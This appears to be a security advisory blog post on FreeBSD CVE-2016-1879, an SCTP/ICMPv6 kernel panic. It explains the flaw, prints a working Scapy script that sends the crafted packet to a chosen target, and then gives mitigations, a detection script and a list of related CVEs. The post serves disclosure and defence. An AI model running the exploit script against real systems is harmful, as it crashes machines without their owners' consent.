
Friday, January 22, 2016

FreeBSD Remote DoS Exploit (Demo) (CVE-2016-1879)


The FreeBSD team has announced that critical vulnerabilities were found in the operating system. They could be exploited to conduct DoS attacks, escalate user privileges, and disclose important data.

SCTP ICMPv6 error processing vulnerability (CVE-2016-1879)

SCTP (Stream Control Transmission Protocol) is a transport-layer protocol designed to transfer signaling messages in an IP environment. As a rule, mobile operators use this protocol in technological networks.

This vulnerability threatens FreeBSD systems (versions 9.3, 10.1, and 10.2) if they support SCTP and IPv6 (the default configuration). To exploit this flaw, an attacker needs to send a specially crafted ICMPv6 message. A successful attack results in a denial of service.

The denial of service is caused by an improper check of the length of the SCTP packet header received in an ICMPv6 error message. If the target recipient is unavailable, a router can generate an error message and send it to the sender via ICMPv6.

This ICMPv6 packet includes the original IPv6 packet, whose Next Header field indicates that the encapsulated protocol is SCTP.



When the kernel receives the error message via ICMPv6, it passes the upper-level protocol packet to the appropriate parser (sctp6_ctlinput()). The SCTP parser assumes that the incoming header has the required length and tries to copy it using m_copydata(), which takes an offset and the number of bytes to copy. Since a twelve-byte chunk is expected, if the attacker sends a packet with an eleven-byte header, a NULL pointer is dereferenced, causing a kernel panic.

There is no need for an open SCTP socket to successfully exploit this vulnerability. Scapy can help to create an ICMPv6 packet.

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import argparse
    from scapy.all import *


    def get_args():
        parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)
        parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address")
        parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address")
        parser.add_argument("-I", "--iface", type=str, help="Iface")
        options = parser.parse_args()

        if options.dst_mac is None or options.dst_ipv6 is None:
            parser.print_help()
            exit()

        return options


    if __name__ == '__main__':
        options = get_args()

        sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() /
              IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c'),
              iface=options.iface)

Below is the video demonstration of the attack.



To protect your system from this flaw, we recommend that you perform the following:

  • Disable IPv6 addressing if not necessary
  • Block ICMPv6 or IPv6 traffic on the firewall
  • Disable SCTP stack support in the OS kernel if it is not needed (kernel recompilation is required)

To fix the vulnerability, you can use the vendor's patch, which adds checks to the processing of SCTP ICMPv6 messages. Kernel recompilation is required.
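The twelve-byte length check described above, seen from the monitoring side: this added example (not code from the original post or from the FreeBSD patch) classifies a raw ICMPv6 message and flags error messages that quote an IPv6 packet announcing SCTP with fewer than twelve bytes behind it. The function names, return labels and sample packets are constructed for illustration.

```python
import struct

IPV6_HDR_LEN = 40          # fixed IPv6 header
ICMPV6_HDR_LEN = 8         # type, code, checksum + 4 bytes (unused/MTU/pointer)
IPPROTO_SCTP = 132
SCTP_COMMON_HDR_LEN = 12   # src port, dst port, verification tag, checksum
EXT_HEADERS = {0, 43, 60}  # hop-by-hop, routing, destination options
# Assumption: a quoted Fragment header (44) is not followed; it yields "not-sctp".


def classify_icmpv6(icmp6: bytes) -> str:
    """Classify one ICMPv6 message, given from its type byte onward."""
    if len(icmp6) < ICMPV6_HDR_LEN:
        return "malformed"
    if icmp6[0] >= 128:                      # RFC 4443: error messages are types 0-127
        return "not-error"
    inner = icmp6[ICMPV6_HDR_LEN:]           # the quoted packet that caused the error
    if len(inner) < IPV6_HDR_LEN or inner[0] >> 4 != 6:
        return "malformed"
    nh, off = inner[6], IPV6_HDR_LEN
    while nh in EXT_HEADERS:                 # skip extension headers, bounds-checked
        if len(inner) < off + 8:
            return "malformed"
        nh, off = inner[off], off + (inner[off + 1] + 1) * 8
    if off > len(inner):
        return "malformed"
    if nh != IPPROTO_SCTP:
        return "not-sctp"
    # The check the article describes as missing: are 12 header bytes really present?
    if len(inner) - off < SCTP_COMMON_HDR_LEN:
        return "short-sctp"
    return "ok"


def sample(sctp_bytes: int, ext: bytes = b"", first_nh: int = IPPROTO_SCTP) -> bytes:
    """Constructed input: Destination Unreachable quoting an IPv6 packet."""
    addr = bytes.fromhex("20010db8" + "00" * 11 + "01")   # 2001:db8::1 (documentation range)
    body = ext + bytes(sctp_bytes)
    ip6 = struct.pack("!IHBB", 6 << 28, len(body), first_nh, 64) + addr + addr + body
    return struct.pack("!BBHI", 1, 0, 0, 0) + ip6         # checksum left 0, not verified here


if __name__ == "__main__":
    dest_opts = bytes([IPPROTO_SCTP, 0]) + bytes(6)       # 8-byte destination options header
    cases = {
        "full SCTP header quoted": sample(12),
        "eleven-byte SCTP header": sample(11),
        "short header behind dest-opts": sample(11, ext=dest_opts, first_nh=60),
        "quoted TCP packet": sample(20, first_nh=6),
    }
    for name, pkt in cases.items():
        print(f"{name:32s} -> {classify_icmpv6(pkt)}")
```

A "short-sctp" result on a FreeBSD 9.3, 10.1 or 10.2 network segment is worth logging together with the source of the ICMPv6 message.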

And that's not the half of it

Other severe vulnerabilities were also found in the system. The FreeBSD developers released several patches to close these flaws:

  1. A vulnerability that allows for a DoS attack via exploiting TCP connections if TCP_MD5SIG and TCP_NOOPT are enabled. A hacker needs to open a listening socket with the TCP_NOOPT option enabled to exploit this flaw (CVE-2016-1882, the patch).
  2. A vulnerability that allows for user privilege escalation or DoS. It is caused by an access control error that makes it possible to rewrite random memory fields using Linux setgroups(2) (CVE-2016-1881, the patch).
  3. A Linux Robust Futex error allows for system memory data disclosure (CVE-2016-1880, the patch).
  4. Insecure default settings that allow access to the daemon configuration file “/etc/bsnmpd.conf” (CVE-2015-5677, the patch).

To protect your systems from exploitation of these vulnerabilities, Positive Technologies recommends that you use IPv6 addressing only if it is strongly required, install security patches promptly, and use special tools to control system security (e.g. MaxPatrol).
